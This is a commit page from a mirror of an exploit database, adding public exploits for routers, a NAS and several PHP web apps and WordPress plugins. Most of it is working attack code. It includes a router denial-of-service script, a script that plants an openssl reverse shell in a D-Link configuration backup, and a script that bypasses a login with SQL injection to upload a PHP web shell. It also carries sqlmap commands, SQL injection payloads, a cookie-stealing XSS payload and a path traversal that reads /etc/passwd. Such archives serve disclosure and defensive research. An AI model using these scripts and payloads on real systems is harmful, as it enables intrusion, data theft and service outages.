bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-03-26

Browse source 
22 changes to exploits/shellcodes/ghdb

Password Manager for IIS v2.0 - XSS

DLink DIR 819 A1 - Denial of Service

D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution

Abantecart v1.3.2 - Authenticated Remote Code Execution

Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)

Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution

Employee Performance Evaluation System v1.0 - File Inclusion and RCE

GuppY CMS v6.00.10 - Remote Code Execution

Human Resources Management System v1.0 - Multiple SQLi

ImpressCMS v1.4.3 - Authenticated SQL Injection

Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal

MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution

NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS

SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution

Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection

Yoga Class Registration System v1.0 - Multiple SQLi

NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle

_camp_ Raspberry Pi camera server 1.0 -  Authentication Bypass

System Mechanic v15.5.0.61 - Arbitrary Read/Write
This commit is contained in:
Exploit-DB 2023-03-26 00:16:30 +00:00
parent 3be88e5f7b
commit 79023d1f9c
22 changed files with 1535 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
exploits/asp/webapps/51055.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Password Manager for IIS v2.0 - XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
# Version: *Version 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664
Affected URI (when changing user password):
POST /isapi/PasswordManager.dll HTTP/1.1
Affected Parameter in http
payload:*ReturnURL*=<script>alert(document.cookie)</script>
*Cordially,*

109
exploits/hardware/dos/51053.txt Normal file
View file

@ -0,0 +1,109 @@
# Exploit Title: DLink DIR 819 A1 - Denial of Service
# Date: 30th September, 2022
# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
# Tested on: Firmware Version - 1.06 Hardware Version - A1
# CVE : CVE-2022-40946
#
# Github: https://github.com/whokilleddb/dlink-dir-819-dos
#
# $ ./exploit.py -i 192.168.0.1
# [+] DLink DIR-819 DoS exploit
# [i] Address to attack: 192.168.0.1
# [i] Using SSL: False
# [i] Request Timeout: 30s
# [i] Buffer Length: 19
# [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
# [+] Exploit Successful!
#!/usr/bin/env python3
import sys
import string
import urllib3
import requests
import argparse
import random
import socket
from rich import print
# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Globals
TIMEOUT = 30
#BUFFER_LEN = 19
BUFFER_LEN = 32
# Class to exploit
class Exploit:
def __init__(self, ip, is_ssl):
"""Initialize the constructor"""
self.ip = ip
self.is_ssl = is_ssl
_payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
if self.is_ssl:
self.payload = f"https://{_payload}"
else:
self.payload = f"http://{_payload}"
def show(self):
"""Show the parameters"""
print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")
def run(self):
"""Run the exploit"""
print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
self.show()
try:
r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
if "Internal Error" in r.text:
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
else:
print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")
except requests.exceptions.Timeout:
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
except Exception as e:
print(f"Error occured as: {e}")
def main():
"""Main function to run"""
parser = argparse.ArgumentParser(
description="DLink DIR-819 Unauthenticated DoS")
parser.add_argument('-i', '--ip', required=True, help="IP of the router")
parser.add_argument('-s', '--ssl', required=False, action="store_true")
opts = parser.parse_args()
try:
ip = socket.gethostbyname(opts.ip)
except socket.error:
print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
return
is_ssl = opts.ssl
exploit = Exploit(ip, is_ssl)
exploit.run()
if __name__ == '__main__':
main()

271
exploits/hardware/remote/51046.txt Normal file
View file

@ -0,0 +1,271 @@
# Exploit Title: D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution
# Date: 13.09.2022
# Exploit Author: luka <luka@lukasec.ch>
# Exploit Writeup: https://lukasec.ch/posts/dlink_dnr322.html
# Vendor Homepage: https://dlink.com
# Vendor Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10305
# Software Link: http://legacyfiles.us.dlink.com/DNR-322L/REVA/FIRMWARE
# Version: <= 2.60B15
# Tested on: Debian, Windows 10
"""
# Vulnerability
Inside the configuration backup from "Maintenance/System/Configuration Settings" is the bash script "rc.init.sh". The device does not check the integrity of a restored configuration backup which enables editing of set bash script. This bash script will be executed when the device boots.
# Usage
exploit.py [-h] -U USERNAME [-P PASSWORD] -t TARGET -l LHOST -p LPORT
options:
-h, --help show this help message and exit
-U USERNAME, --username USERNAME
Username, ex: admin
-P PASSWORD, --password PASSWORD
Password for the specified user
-t TARGET, --target TARGET
IP of the target, ex: 192.168.99.99
-l LHOST, --lhost LHOST
IP for the reverse shell to connect back to, ex: 123.123.123.123
-p LPORT, --lport LPORT
Port for the reverse shell to connect back to, ex: 8443
"""
import argparse, socket, requests, base64, urllib, os, shutil, tarfile, random, string
from ipaddress import ip_address
args = argparse.ArgumentParser()
args.add_argument(
"-U",
"--username",
type=str,
required=True,
dest="username",
help="Username, ex: admin",
)
args.add_argument(
"-P",
"--password",
type=str,
required=False,
dest="password",
help="Password for the specified user",
)
args.add_argument(
"-t",
"--target",
type=str,
required=True,
dest="target",
help="IP of the target, ex: 192.168.99.99",
)
args.add_argument(
"-l",
"--lhost",
type=str,
required=True,
dest="lhost",
help="IP for the reverse shell to connect back to, ex: 123.123.123.123",
)
args.add_argument(
"-p",
"--lport",
type=int,
required=True,
dest="lport",
help="Port for the reverse shell to connect back to, ex: 8443",
)
args = args.parse_args()
# base64 + url encode string
# returns string
def b64_url_encode(data):
enc = data.encode("utf-8")
encB = base64.b64encode(enc)
encUrl = urllib.parse.quote(str(encB, "utf-8"))
return encUrl
# since user input is always unsafe, test IPs
try:
ip_address(args.target)
except Exception:
print("[!] Target IP is not a valid IP address")
exit(1)
try:
ip_address(args.lhost)
except Exception:
print("[!] Reverse shell IP is not a valid IP address")
exit(1)
# check if target is online
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
# hardcoded http, change if needed
s.connect((args.target, 80))
s.close()
except Exception:
print("[!] Target is not online")
exit(1)
print("[+] Target is online")
# login param
authUrl = "http://" + args.target + "/cgi-bin/login_mgr.cgi"
authHeaders = {"content-type": "application/x-www-form-urlencoded"}
authCheckCmd = "cmd=ui_check_wto"
session = requests.Session()
# if password is empty supply dont supply anything
if not args.password:
authBody = (
"cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
+ args.username
+ "&pwd=&ssl_port=443&f_login_type=0&f_url="
)
else:
authBody = (
"cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
+ args.username
+ "&pwd="
+ b64_url_encode(args.password)
+ "&ssl_port=443&f_login_type=0&f_url="
)
try:
# login
reqLogin = session.post(authUrl, headers=authHeaders, data=authBody)
# check if successful
reqCheck = session.post(authUrl, headers=authHeaders, data=authCheckCmd)
if "success" in reqCheck.text:
print("[+] Login successful")
else:
print("[!] Error during login, check credentials")
exit(1)
except Exception as error:
print(error)
print("[!] Error during login, check credentials")
exit(1)
# download backup
print("[*] Downloading backup")
if os.path.exists("backup_clean"):
os.remove("backup_clean")
# download param
downloadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
downloadHeaders = {"content-type": "application/x-www-form-urlencoded"}
downloadCmd = "cmd=cgi_backup_conf"
try:
reqBackup = session.post(downloadUrl, headers=downloadHeaders, data=downloadCmd)
except Exception as error:
print(error)
print("[!] Error while downloading backup")
exit(1)
# saving to disk
try:
f = open("backup_clean", "wb")
f.write(reqBackup.content)
f.close()
if not os.path.exists("backup_clean"):
print("[!] Error while saving backup")
exit(1)
except Exception as error:
print(error)
print("[!] Error while saving backup")
exit(1)
print("[+] Download successful")
# unpack backup (tar.gz file)
try:
config = tarfile.open("backup_clean")
config.extractall()
config.close()
except Exception as error:
print(error)
print("[!] Error while unpacking backup")
exit(1)
# inject stuff into startup script
try:
bashscript = open("backup/rc.init.sh", "a")
# revshell with openssl
payload = (
"\n(( sleep 10; rm -f /tmp/lol; mknod /tmp/lol p; cat /tmp/lol | /bin/ash -i 2>&1 | openssl s_client -quiet -connect %s:%s >/tmp/lol & ) & )\n"
% (args.lhost, args.lport)
)
bashscript.write(payload)
# also start a telnet deamon (has same passwd as web)
# bashscript.write("utelnetd -d")
bashscript.close()
except Exception as error:
print(error)
print("[!] Error while creating malicious backup")
exit(1)
print("[+] Created malicious backup")
# re pack file
try:
configInj = tarfile.open("backup_injected", "w:gz")
configInj.add("backup")
configInj.close()
# remove unpacked folder
shutil.rmtree("backup", ignore_errors=False, onerror=None)
except Exception as error:
print(error)
print("[!] Error while re-packing malicious backup")
exit(1)
# upload
print("[*] Uploading malicious backup")
uploadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
uploadHeaders = {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryhellothere"
}
configInj = open("backup_injected", "rb")
tardata = configInj.read().decode("latin-1")
uploadBody = (
'------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="cmd"\r\n\r\ncgi_restore_conf\r\n------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="file"; filename="backup"\r\nContent-Type: application/x-gzip\r\n\r\n'
+ tardata
+ "\r\n------WebKitFormBoundaryhellothere--\r\n"
)
reqUpload = session.post(uploadUrl, headers=uploadHeaders, data=uploadBody)
if "web/dsk_mgr/wait.html" in reqUpload.text:
print("[+] Upload successful, target will reboot now")
else:
print("[!] Error while uploading malicious backup")
exit(1)
# creating listener
print("[*] Started listener, waiting for the shell to connect back")
print("[*] When you are done kill the shell with Ctrl+C")
# random name
randInt = "".join(random.choice(string.ascii_lowercase) for i in range(10))
# generate the cert and the key for the openssl listener
os.system(
'openssl req -x509 -newkey rsa:4096 -keyout /tmp/%s_key.pem -out /tmp/%s_cert.pem -days 365 -nodes -subj "/CN=example.com" 2> /dev/null'
% (randInt, randInt)
)
# create an openssl listener
os.system(
"openssl s_server -quiet -key /tmp/%s_key.pem -cert /tmp/%s_cert.pem -port %s"
% (randInt, randInt, args.lport)
)
exit(0)

26
exploits/php/webapps/51042.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
# Exploit Author: Elias Hohl
# Date: 2022-08-01
# Vendor Homepage: https://basixonline.net
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3142
Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
1. Start a new Wordpress instance using docker-compose.
2. Install the NEX Forms plugin.
3. Open the URL "/wp-admin/admin.php?page=3Dnex-forms-dashboard&form_id=3D1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=3DT --dbms=3Dmysql --level 5 --risk 3
sqlmap will find a time-based blind payload:
Parameter: form_id (GET)
Type: time-based blind
Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
Payload: page=3Dnex-forms-dashboard&form_id=3D1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)

34
exploits/php/webapps/51043.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection
# Exploit Author: Elias Hohl
# Date: 2022-07-23
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
# Version: < 2.3.3
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3141
Authenticated SQL injection vulnerability in "Translatepress Multilingual" Wordpress plugin
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-translatepress-multilingual-wordpress-plugin-effc08eda514
1. Start a new Wordpress instance using docker-compose.
2. Install the translatepress-multilingual plugin. Important note: If there are more than two languages allowed in a kind of premium plan, the exploit might be slightly different. We might need to insert deletion requests between each injection to prevent payloads being executed again. Also note that the en_us_en_gb dictionary table must exist. You might need to add these languages first so the table gets created.
3. Connect your browser to Burp Suite, log in to Wordpress and add any language from the dropdown (the url to do this is /wp-admin/options-general.php?page=translate-press). In Burp Suite, do a right click→ copy to file, and save it as translatepress_req.txt.
4. Go to /sample-page/?trp-edit-translation=preview (a URL to translate an arbitrary post). Again, in Burp Suite do a right mouse click → save to file, and save it as translatepress_req_2.txt.
5. Attack using sqlmap: sqlmap -r translatepress_req.txt -p trp_settings%5Btranslation-languages%5D%5B%5D --dbms=mysql --second-req translatepress_req_2.txt --technique=T --level 5 --risk 3
sqlmap will find a time-based blind payload:
Parameter: trp_settings[translation-languages][] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option_page=trp_settings&action=update&_wpnonce=ca410d0e89&_wp_http_referer=/wp-admin/options-general.php?page=translate-press%26settings-updated=true&trp_settings[default-language]=en_US&trp_settings[publish-languages][]=en_US&trp_settings[translation-languages][]=en_US&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_US]=en_us&trp_settings[translation-languages][]=en_GB WHERE 4372=4372 AND (SELECT 6967 FROM (SELECT(SLEEP(5)))ZDtR)-- bsZU&trp_settings[publish-languages][]=en_GB&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_GB]=en&trp_settings[native_or_english_name]=english_name&trp_settings[add-subdirectory-to-default-language]=no&trp_settings[force-language-to-custom-links]=yes&trp_settings[shortcode-options]=flags-full-names&trp_settings[menu-options]=flags-full-names&trp_settings[trp-ls-floater]=yes&trp_settings[floater-options]=flags-full-names&trp_settings[floater-color]=dark&trp_settings[floater-position]=bottom-right&trp_email_course_email=

80
exploits/php/webapps/51045.txt Normal file
View file

@ -0,0 +1,80 @@
# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# Version: 1.0
# Authentication Required: bypass login with sql injection
#/usr/bin/python3
import requests
import os
import sys
import time
import random
# clean screen
os.system("cls")
os.system("clear")
logo = '''
##################################################################
# #
# Exploit Script ( Online Diagnostic Lab Management System ) #
# #
##################################################################
'''
print(logo)
url = str(input("Enter website url : "))
username = ("' OR 1=1-- -")
password = ("test")
req = requests.Session()
target = url+"/diagnostic/login.php"
data = {'username':username,'password':password}
website = req.post(target,data=data)
files = open("rev.php","w")
payload = "<?php system($_GET['cmd']);?>"
files.write(payload)
files.close()
hash = random.getrandbits(128)
name_file = str(hash)+".php"
if "Login Successfully" in website.text:
print("[+] Login Successfully")
website_1 = url+"/diagnostic/php_action/createOrder.php"
upload_file = {
"orderDate": (None,""),
"clientName": (None,""),
"clientContact" : (None,""),
"productName[]" : (None,""),
"rateValue[]" : (None,""),
"quantity[]" : (None,""),
"totalValue[]" : (None,""),
"subTotalValue" : (None,""),
"totalAmountValue" : (None,""),
"discount" : (None,""),
"grandTotalValue" : (None,""),
"gstn" : (None,""),
"vatValue" : (None,""),
"paid" : (None,""),
"dueValue" : (None,""),
"paymentType" : (None,""),
"paymentStatus" : (None,""),
"paymentPlace" : (None,""),
"productImage" : (name_file,open("rev.php","rb"))
}
up = req.post(website_1,files=upload_file)
print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
else:
print("[-] Check username or password")

80
exploits/php/webapps/51047.txt Normal file
View file

@ -0,0 +1,80 @@
# Exploit Title: Human Resources Management System v1.0 - Multiple SQLi
# Date: 16/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0
# Tested on: Windows
## Description
A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "name" parameter.
## Request PoC
```
POST /hrm/controller/login.php HTTP/1.1
Host: 192.168.1.103
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.103/hrm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
name=test@testdomain.com'&password=test&submit=Sign+In
```
This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "name" parameter, the response to request was 302 status code with message of Found, but 20 seconds later, which indicates that our sleep 20 command works.
```
POST /hrm/controller/login.php HTTP/1.1
Host: 192.168.1.103
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.103/hrm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In
```
## Exploit with sqlmap
Save the request from burp to file
```
┌──(root㉿caesar)-[/home/kali/Workstation/hrm]
└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2
---snip----
[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In
---
[15:49:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.0, Apache 2.4.54, PHP
----snip----
```
## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.

71
exploits/php/webapps/51048.txt Normal file
View file

@ -0,0 +1,71 @@
# Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi
# Date: 19/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip
# Version: 1.0
# Tested on: Windows, Linux
## Description
A Blind SQL injection vulnerability in the "cid" parameter in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands.
## Request PoC
```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
```
This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "cid" parameter, the response to request was 200 status code with message of OK, but 10 seconds later, which indicates that our sleep 10 command works.
```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
```
## Exploit with sqlmap
Save the request from burp to file
```
sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2
---snip---
GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY
---
[16:00:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.2.0
---snip---
```
## The "id" parameter in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" are also vulnerable. It can be exploited in the same way.

58
exploits/php/webapps/51049.txt Normal file
View file

@ -0,0 +1,58 @@
## Exploit Title: Employee Performance Evaluation System v1.0 - File Inclusion and RCE
## Exploit Author: nu11secur1ty
## Date: 03.17.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/
## Description:
The Employee Performance Evaluation System-1.0 suffer from File
Inclusion - RCE Vulnerabilities.
The usual user of this system is allowed to submit a malicious file or
upload a malicious file to the server.
After then this user can execute remotely the already malicious
included file on the server of the victim. This can bring the system
to disaster or can destroy all information that is inside or this
information can be stolen.
STATUS: CRITICAL Vulnerability
[+]Get Info:
```PHP
<?php
// by nu11secur1ty - 2023
phpinfo();
?>
```
[+]Exploit:
```PHP
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
```
## Proof Of Concept:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

66
exploits/php/webapps/51050.txt Normal file
View file

@ -0,0 +1,66 @@
## Exploit Title: Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal
## Exploit Author: nu11secur1ty
## Date: 09.29.2022
## Vendor: https://lavalite.org/
## Software: https://github.com/LavaLite/cms/releases/tag/v9.0.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite
## Description:
The XSRF-TOKEN cookie is vulnerable to path traversal attacks,
enabling read access to arbitrary files on the server.
The payload ../../../../../../../../../../../../../../../../etc/passwd[0x00]eyJpdiI6InhwNlhibUc0K3hrL3RQdHZNYlp5Qnc9PSIsInZhbHVlIjoiU2daQ2YzeFNWSjN4OHZNdEZSMlhiOVpkbGUweDdKSDdXbXc1eitGc3RSTXNFTFBqUGR1ekJOSitUTjcyWVRYTkVzV2lpMDkxb3FHM2k5S1Y2VlZZRGVVN2h2WkpJeGcxZVluVDhrdDkvUDgxN2hTNjY5elRtQllheDlPOEM5aGgiLCJtYWMiOiI4ZDBkMjI0NmFkNDQ2YTA5ZjhkNDI0ZjdhODk0NWUzMjY2OTIxMjRmMzZlZjI4YWMwNmRiYTU5YzRiODE5MDk5IiwidGFnIjoiIn0=
was submitted in the XSRF-TOKEN cookie.
The requested file was returned in the application's response. The
malicious user can get very sensitive information from this CMS
system.
STATUS: HIGH Vulnerability
[+]Payload:
```POST
GET /cms-master/website/public/about.html HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: XSRF-TOKEN=eyJpdiI6IjNZbEZudjg0RXpFNEVLWHBUK0p6R1E9PSIsInZhbHVlIjoiNjFVbmZUVUJQWVdYWXJVOUVJRWVVdHN0UWtOQjJXZGRiS2N4T2lkM0VDeXFxcDRZdG1tRFVaQUk3dlhsWHRvOVQxVnQvbFhWRUJTbUllczh6MmhFUE84N1puNVFMSVFFeWdmRlJUYkdFRGdCakZ4eEJXeHllRTdFOFNPK0pLcnkiLCJtYWMiOiJhMDBlZWFiNDFlNzE2Yzc1ZjA2NzEzYzY2Y2U0ZDQ3NzdkMTI4OTY1NjA4OTNmNDE4ZDNmNWRkYzFkN2IzMWEwIiwidGFnIjoiIn0%3D;
lavalite_session=eyJpdiI6ImxiWmVuV0xlU3ZtVWhLVW1Oc2duSEE9PSIsInZhbHVlIjoiUG5WMjhMNVppUkhST1Bta1FOd1VJUDR5ZW1lRU56bXpDTnpaVzkrUHFzQzJpKzE4YlFuNEQ2RnNlKzM2Tkg0Y2VZMExCRTBUUnRQajlpTmJCUXJjT3ZETzV6OVZveURuaTFHOHdoN3pneUR3NGhQc09OUjdKb0VreFV1Y0tuOTgiLCJtYWMiOiJlMTdlMTAyZTQ3MmMyMjZlMWE5MTkwMzc0NTU2OTFkOTlmOTM4MGVlZDE4NWU4MGNkZGM4OTllMTRmYTE3MGM1IiwidGFnIjoiJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmZXRjJTJmcGFzc3dkIn0%3d
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/cms-master/website/public/
